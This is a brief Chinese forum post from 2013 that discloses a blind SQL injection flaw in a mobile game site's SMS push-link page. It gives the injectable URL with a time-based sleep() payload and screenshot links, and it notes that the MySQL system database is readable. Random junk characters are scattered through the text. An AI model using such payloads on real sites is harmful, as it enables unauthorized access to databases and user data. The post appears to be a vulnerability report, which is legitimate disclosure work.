简要描述:3 m0 ~! M, g. [1 d3 r: H8 t3 w
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。3 `1 J0 f' {% ~8 d! m. [" ^$ U
( A& Y# g D8 d) k7 K1 B, z6 j详细说明:' |6 y2 z3 _4 \4 ~8 u$ q4 |: X3 ~* u
存在SQL盲注url:+ O- O& X: d, H3 Q) b5 q
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1 G7 h* g0 L& r. L$ B
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png! p1 B3 K: t H5 l* R. u- K* _6 h
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png& n# P/ m6 o! |. J( J8 U& y6 y
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
8 E' _+ I- Z/ R }
* V8 R, k9 S v2 y; B6 y6 H能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对